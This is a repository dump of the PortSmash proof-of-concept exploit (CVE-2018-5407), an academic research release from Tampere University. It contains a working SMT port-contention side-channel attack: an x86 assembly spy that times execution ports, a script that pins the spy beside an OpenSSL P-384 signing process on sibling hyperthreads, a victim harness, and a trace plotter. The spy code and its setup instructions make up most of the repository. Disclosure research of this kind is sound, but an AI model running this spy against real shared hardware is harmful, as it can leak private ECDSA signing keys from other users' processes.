├── .gitattributes ├── .gitignore ├── LICENSE ├── Makefile ├── NOTICE ├── README.md ├── ecc.c ├── freq.sh ├── parse_raw_simple.png ├── parse_raw_simple.py ├── spy.S ├── spy.c ├── spy.h └── sync.sh /.gitattributes: -------------------------------------------------------------------------------- 1 | **/*.png filter=lfs diff=lfs merge=lfs -text 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.bin 2 | *.pem 3 | *.sig 4 | ecc 5 | spy 6 | pipe.fifo 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS += -g -Wall 2 | OPENSSL_ROOT_DIR=/usr/local/ssl 3 | 4 | all: spy ecc 5 | 6 | spy: spy.c spy.S 7 | $(CC) -o $@ $^ $(CFLAGS) 8 | 9 | ecc: ecc.c 10 | $(CC) -o $@ $< $(CFLAGS) -lcrypto -I$(OPENSSL_ROOT_DIR)/include -L$(OPENSSL_ROOT_DIR)/lib -Wl,-rpath=$(OPENSSL_ROOT_DIR)/lib 11 | 12 | clean: 13 | rm -f spy ecc *~ *.pyc 14 | 15 | deepclean: clean 16 | rm -f timings.bin data.bin data.sig secp384r1.pem 17 | 18 | .PHONY: clean deepclean 19 | -------------------------------------------------------------------------------- /NOTICE: -------------------------------------------------------------------------------- 1 | PortSmash Proof-of-Concept exploit 2 | Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 3 | 4 | This product includes software developed at Tampere University (formerly 5 | Tampere University of Technology) to demonstrate the PortSmash 6 | side-channel technique (CVE-2018-5407) described in 7 | https://ia.cr/2018/1060 . 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by [CVE-2018-5407](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407). 4 | 5 | More technical details about the PortSmash side-channel are available in [this manuscript](https://eprint.iacr.org/2018/1060). 6 | 7 | ![Alt text](parse_raw_simple.png?raw=true "sample PortSmash visualization tooling") 8 | 9 | # License 10 | 11 | This software is licensed under the terms of the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0). 12 | 13 | Check [LICENSE](LICENSE) and [NOTICE](NOTICE) for more details. 14 | 15 | # Setup 16 | 17 | ## Prerequisites 18 | 19 | A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement. 20 | 21 | This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed. 22 | 23 | ## OpenSSL 24 | 25 | Download and install OpenSSL 1.1.0h or lower: 26 | 27 | cd /usr/local/src 28 | wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz 29 | tar xzf openssl-1.1.0h.tar.gz 30 | cd openssl-1.1.0h/ 31 | export OPENSSL_ROOT_DIR=/usr/local/ssl 32 | ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib 33 | make -j8 34 | make test 35 | sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw 36 | 37 | If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`. 38 | 39 | # Tooling 40 | 41 | ## freq.sh 42 | 43 | Turns off frequency scaling and TurboBoost. 44 | 45 | ## sync.sh 46 | 47 | Sync trace through pipes. It has two victims, one of which should be active at a time: 48 | 49 | 1. The stock `openssl` running `dgst` command to produce a P-384 signature. 50 | 2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.) 51 | 52 | The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist. 53 | 54 | The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with 55 | 56 | openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin 57 | 58 | In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created. 59 | 60 | For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with 61 | 62 | $ grep '^processor\|^core id' /proc/cpuinfo 63 | processor : 0 64 | core id : 0 65 | processor : 1 66 | core id : 1 67 | processor : 2 68 | core id : 2 69 | processor : 3 70 | core id : 3 71 | processor : 4 72 | core id : 0 73 | processor : 5 74 | core id : 1 75 | processor : 6 76 | core id : 2 77 | processor : 7 78 | core id : 3 79 | 80 | So the script is currently configured for logical cores 3 and 7 (`processor`) that both map to physical core 3 (`core_id`). 81 | 82 | ## spy 83 | 84 | Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time. 85 | 86 | Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary. 87 | 88 | ## ecc 89 | 90 | Victim harness for running OpenSSL scalar multiplication with known inputs. Example: 91 | 92 | ./ecc M 4 deadbeef0123456789abcdef00000000c0ff33 93 | 94 | Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar. 95 | 96 | ## parse_raw_simple.py 97 | 98 | Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here. 99 | 100 | You might have to adjust the `CEIL` variable if the plots are too aggressively clipped. 101 | 102 | Python packages: 103 | 104 | sudo apt-get install python-numpy python-matplotlib python-scipy 105 | 106 | Optional but recommended to view peaks: 107 | 108 | sudo pip install --upgrade scipy 109 | 110 | # Usage 111 | 112 | Turn off frequency scaling: 113 | 114 | ./freq.sh 115 | 116 | Make sure everything builds: 117 | 118 | make clean 119 | make 120 | 121 | Take a measurement: 122 | 123 | ./sync.sh 124 | 125 | View the trace: 126 | 127 | python parse_raw_simple.py timings.bin 128 | 129 | You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`. 130 | 131 | # Credits 132 | 133 | ## Authors 134 | 135 | * Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba) 136 | * Billy Bob Brumley (Tampere University, Tampere, Finland) 137 | * Sohaib ul Hassan (Tampere University, Tampere, Finland) 138 | * Cesar Pereida García (Tampere University, Tampere, Finland) 139 | * Nicola Tuveri (Tampere University, Tampere, Finland) 140 | 141 | ## Funding 142 | 143 | This project has received funding from the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No 804476). 144 | 145 | -------------------------------------------------------------------------------- /ecc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include "spy.h" 25 | 26 | int main(int argc, char * argv[]) { 27 | 28 | if (argc < 4 || (strcmp(argv[1], "A") && strcmp(argv[1], "D") && strcmp(argv[1], "AD") && strcmp(argv[1], "M"))) { 29 | printf("usage: %s /* (A)dd (D)ouble (M)ultiply */\n", argv[0]); 30 | return 0; 31 | } 32 | 33 | /* number of iterations */ 34 | int its = atoi(argv[2]); 35 | /* create new CTX*/ 36 | BN_CTX *ctx = BN_CTX_new(); 37 | assert(ctx != NULL); 38 | BN_CTX_start(ctx); 39 | 40 | EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp384r1); 41 | //EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp521r1); 42 | //EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_brainpoolP512r1); 43 | assert(group != NULL); 44 | 45 | /* initialize variables */ 46 | BIGNUM *k, *order, *x, *y; 47 | k = BN_CTX_get(ctx); 48 | order = BN_CTX_get(ctx); 49 | x = BN_CTX_get(ctx); 50 | y = BN_CTX_get(ctx); 51 | assert(y != NULL); 52 | 53 | /* initialize EC points */ 54 | EC_POINT *Q = EC_POINT_new(group); 55 | EC_POINT *P = EC_POINT_new(group); 56 | assert(Q != NULL); 57 | assert(P != NULL); 58 | 59 | EC_GROUP_get_order(group, order, ctx); 60 | 61 | /* receive nonce from cmd, generate random nonce if not provided */ 62 | BN_hex2bn(&k, argv[3]); 63 | 64 | if (BN_is_zero(k)) 65 | BN_rand_range(k, order); 66 | 67 | /* compute [P]k and copy to Q */ 68 | EC_POINT_mul(group, P, k, NULL, NULL, ctx); 69 | EC_POINT_make_affine(group, P, ctx); 70 | EC_POINT_copy(Q, P); 71 | 72 | /* block computation using a pipe until receive from spy -- to sync victim and spy */ 73 | size_t ret; 74 | uint8_t *zeroes = (uint8_t *)calloc(ZERO_COUNT, sizeof(uint8_t)); 75 | assert(zeroes != NULL); 76 | FILE *pipe; 77 | pipe = fopen(SPY_PIPE, "rb"); 78 | assert(pipe != NULL); 79 | ret = fread(zeroes, sizeof(uint8_t), ZERO_COUNT, pipe); 80 | assert(ret == ZERO_COUNT); 81 | fclose(pipe); 82 | free(zeroes); 83 | 84 | /* perform Add and Double */ 85 | if (!strcmp(argv[1], "AD")) { 86 | for (; its; its--) { 87 | EC_POINT_add(group, Q, Q, P, ctx); 88 | } 89 | for (; its; its--) { 90 | EC_POINT_dbl(group, Q, Q, ctx); 91 | } 92 | } 93 | /* perform only ADD or DOUBLE or MULTIPLY */ 94 | else if (!strcmp(argv[1], "A")) { 95 | for (; its; its--) { 96 | EC_POINT_add(group, Q, Q, P, ctx); 97 | } 98 | } 99 | else if (!strcmp(argv[1], "D")) { 100 | for (; its; its--) { 101 | EC_POINT_dbl(group, Q, Q, ctx); 102 | } 103 | } 104 | else if (!strcmp(argv[1], "M")) { 105 | for (; its; its--) { 106 | EC_POINT_mul(group, Q, k, NULL, NULL, ctx); 107 | } 108 | } 109 | else { 110 | assert(0); 111 | } 112 | 113 | /* get x and y coordinates from Q */ 114 | EC_POINT_get_affine_coordinates_GFp(group, Q, x, y, ctx); 115 | char *s0 = BN_bn2hex(k); 116 | char *s1 = BN_bn2hex(x); 117 | char *s2 = BN_bn2hex(y); 118 | /* print to console */ 119 | printf(" k: 0x%s\n", s0); 120 | printf("Px: 0x%s\n", s1); 121 | printf("Py: 0x%s\n", s2); 122 | 123 | /* free memory */ 124 | BN_CTX_end(ctx); 125 | EC_POINT_free(P); 126 | EC_POINT_free(Q); 127 | EC_GROUP_free(group); 128 | BN_CTX_free(ctx); 129 | 130 | free(s0); 131 | free(s1); 132 | free(s2); 133 | 134 | return 0; 135 | } 136 | -------------------------------------------------------------------------------- /freq.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "1" | sudo tee /sys/devices/system/cpu/intel_pstate/no_turbo 4 | echo "performance" | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor 5 | -------------------------------------------------------------------------------- /parse_raw_simple.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:bdc0f66dd99520ff6227b75e76e01f67ad2a377feb70b40b962ef9e9f219ef2a 3 | size 323309 4 | -------------------------------------------------------------------------------- /parse_raw_simple.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | # Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | 18 | 19 | import sys 20 | import array 21 | import warnings 22 | from scipy import signal 23 | import numpy as np 24 | import matplotlib.pyplot as plt 25 | 26 | # tweakable parameter: signal clipping 27 | CEIL = 511 28 | 29 | def normalize(x): 30 | if x > CEIL: x = CEIL 31 | if x < 0: x = CEIL 32 | return x 33 | 34 | def running_mean(x, N): 35 | cumsum = np.cumsum(np.insert(x, 0, 0)) 36 | return (cumsum[N:] - cumsum[:-N]) / N 37 | 38 | try: 39 | fp = open(sys.argv[1], "rb") 40 | except: 41 | print("Usage: python %s " % (sys.argv[0])) 42 | sys.exit(1) 43 | 44 | out = fp.read() 45 | fp.close() 46 | 47 | timings = array.array('I') 48 | timings.frombytes(out) 49 | 50 | lats = [] 51 | 52 | for i in range(0,len(timings),2): 53 | lats.append(timings[i+1]-timings[i]) 54 | 55 | lats = list(map(normalize, lats)) 56 | ma2 = running_mean(lats, 2) 57 | ma4 = running_mean(lats, 4) 58 | # (9,3) are tweakable parameters 59 | ma8 = signal.savgol_filter(lats,9,3) 60 | 61 | params = {'fillstyle':'full','markeredgewidth':0.0,'ms':4.0} 62 | f, axarr = plt.subplots(4, sharex=True, sharey=True) 63 | # plot the trace 64 | axarr[0].plot(lats,**params) 65 | # plot the filtered traces 66 | axarr[1].plot(ma2,**params) 67 | axarr[2].plot(ma4,**params) 68 | axarr[3].plot(ma8,**params) 69 | # try to plot the peaks 70 | try: 71 | # (240,90) are tweakable parameters 72 | PEAK_MPH = 240 73 | PEAK_MPD = 90 74 | peaks, properties = signal.find_peaks(ma4, height=PEAK_MPH, distance=PEAK_MPD) 75 | axarr[2].scatter(peaks, [ma4[p] for p in peaks], color='red') 76 | peaks, properties = signal.find_peaks(ma8, height=PEAK_MPH, distance=PEAK_MPD) 77 | axarr[3].scatter(peaks, [ma8[p] for p in peaks], color='red') 78 | except: 79 | warnings.warn("scipy.signal.find_peaks not found: Consult README.md") 80 | 81 | plt.get_current_fig_manager().full_screen_toggle() 82 | plt.show() 83 | 84 | -------------------------------------------------------------------------------- /spy.S: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | #include "spy.h" 18 | 19 | # args : rdi (buf) rsi rdx rcx r8 r9 20 | # scratch: rax r10 r11 21 | 22 | .text 23 | 24 | .global x64_portsmash_spy 25 | .p2align 4 26 | x64_portsmash_spy: 27 | # just some non-degenerate values 28 | add %rdi, %r8 29 | add %rdi, %r9 30 | add %rdi, %r10 31 | add %rdi, %r11 32 | 33 | mov $SPY_NUM_TIMINGS, %rcx 34 | 35 | 1: 36 | lfence 37 | rdtsc # rdx:rax 38 | lfence 39 | mov %rax, %rsi 40 | 41 | #ifdef PORTSMASH_P0156 42 | .rept 64 43 | add %r8, %r8 44 | add %r9, %r9 45 | add %r10, %r10 46 | add %r11, %r11 47 | .endr 48 | #elif defined(PORTSMASH_P015) 49 | .rept 64 50 | paddb %xmm0, %xmm0 51 | paddb %xmm1, %xmm1 52 | paddb %xmm2, %xmm2 53 | .endr 54 | #elif defined(PORTSMASH_P06) 55 | .rept 256 56 | ror $2, %rdx 57 | ror $2, %rax 58 | .endr 59 | #elif defined(PORTSMASH_P15) 60 | .rept 64 61 | andn %r8, %r9, %r8 62 | andn %r10, %r11, %r10 63 | .endr 64 | #elif defined(PORTSMASH_P1) 65 | .rept 48 66 | crc32 %r8, %r8 67 | crc32 %r9, %r9 68 | crc32 %r10, %r10 69 | .endr 70 | #elif defined(PORTSMASH_P5) 71 | .rept 48 72 | vpermd %ymm0, %ymm1, %ymm0 73 | vpermd %ymm2, %ymm3, %ymm2 74 | vpermd %ymm4, %ymm5, %ymm4 75 | .endr 76 | #else 77 | #error Not smashing any ports 78 | #endif 79 | 80 | lfence 81 | rdtsc 82 | shl $32, %rax 83 | or %rsi, %rax 84 | mov %rax, (%rdi) 85 | add $8, %rdi 86 | dec %rcx 87 | jnz 1b 88 | 89 | ret 90 | -------------------------------------------------------------------------------- /spy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | #include "spy.h" 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | int main(int argc, char *argv[]) { 25 | 26 | size_t ret; 27 | /* pipe */ 28 | uint8_t *zeroes = (uint8_t *)calloc(ZERO_COUNT, sizeof(uint8_t)); 29 | FILE *pipe; 30 | pipe = fopen(SPY_PIPE, "wb+"); 31 | assert(pipe != NULL); 32 | ret = fwrite(zeroes, sizeof(uint8_t), ZERO_COUNT, pipe); 33 | assert(ret == ZERO_COUNT); 34 | 35 | fclose(pipe); 36 | free(zeroes); 37 | 38 | /* spy */ 39 | /* size_t ret; */ 40 | ret = 0; 41 | uint64_t *timings = (uint64_t *)calloc(SPY_NUM_TIMINGS, sizeof(uint64_t)); 42 | assert(timings != NULL); 43 | 44 | /* call function in assembler */ 45 | x64_portsmash_spy(timings); 46 | 47 | /* open file */ 48 | FILE *fp; 49 | fp = fopen("timings.bin", "wb+"); 50 | assert(fp != NULL); 51 | 52 | ret = fwrite(timings, sizeof(uint64_t), SPY_NUM_TIMINGS, fp); 53 | assert(ret == SPY_NUM_TIMINGS); 54 | 55 | fclose(fp); 56 | free(timings); 57 | 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /spy.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | #ifndef SPY_H 18 | #define SPY_H 19 | 20 | //#define PORTSMASH_P0156 21 | //#define PORTSMASH_P1 22 | #define PORTSMASH_P5 23 | //#define PORTSMASH_P015 24 | //#define PORTSMASH_P06 25 | //#define PORTSMASH_P15 26 | 27 | #define SPY_NUM_TIMINGS (1<<16) 28 | #define ZERO_COUNT (1<<10) 29 | #define SPY_PIPE "pipe.fifo" 30 | 31 | #ifndef __ASSEMBLER__ 32 | #include 33 | extern void x64_portsmash_spy(uint64_t *buffer); 34 | #endif 35 | 36 | #endif /* SPY_H */ 37 | -------------------------------------------------------------------------------- /sync.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | 18 | OPENSSL=/usr/local/ssl/bin/openssl 19 | KEY_CURVE=secp384r1 20 | KEY_FILE=$KEY_CURVE.pem 21 | 22 | make clean 23 | make 24 | pkill spy 25 | rm -f pipe.fifo 26 | 27 | # create a P-384 key pair if it does not exist 28 | if [ ! -f $KEY_FILE ]; then 29 | $OPENSSL ecparam -genkey -name $KEY_CURVE -out $KEY_FILE 30 | $OPENSSL ec -in $KEY_FILE -pubout >> $KEY_FILE 31 | fi 32 | 33 | # create pipe 34 | mkfifo pipe.fifo 35 | 36 | # Victims: exactly one of these should active at runtime, so make sure exactly one is commented out. 37 | 38 | # Victim 1: start signing but it will be blocked 39 | taskset -c 7 $OPENSSL dgst -sha512 -sign $KEY_FILE -out data.sig pipe.fifo & 40 | 41 | # Victim 2: start scalar multiplication but it will be blocked 42 | #taskset -c 7 ./ecc M 4 